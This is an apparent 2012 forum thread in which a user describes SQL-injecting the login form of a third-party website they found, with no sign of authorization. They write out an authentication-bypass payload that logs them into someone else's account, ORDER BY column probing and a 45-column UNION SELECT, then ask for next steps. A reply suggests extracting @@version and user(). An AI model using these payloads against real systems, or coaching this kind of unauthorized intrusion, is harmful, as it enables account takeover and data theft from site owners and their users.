hello

i follow this guide to learn : http://thehackerlounge.blogspot.fr/2009/05/full-sql-injection-tutorial-mysql.html

on a website i found, the flaw is on a login form, i just have to type a " OR 1=1 LIMIT 100000 OFFSET 1# and i am loged on the first account

so i decided to train on that website

i used " ORDER BY x # and i found... 45 columns O_o --> " ORDER BY 45# no error (log me in) and " ORDER BY 46# returned me an error "Impossible d'exécuter la requête : ligne ( 40 ) Unknown column '46' in 'order clause'"

so i used

" union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45# ... but it just log me in :p

any idea on what i should do next ?

edit : i can give you the website but not sure if its required ?



Edited 1 time(s). Last edit at 04/12/2012 02:04PM by manserk.

see if there is any number appeared on the webpage...then try to replace the number at the URL with what kind of information that you want... for example "@@version" or "user()"..



Edited 1 time(s). Last edit at 04/22/2012 12:59AM by huz.

i think so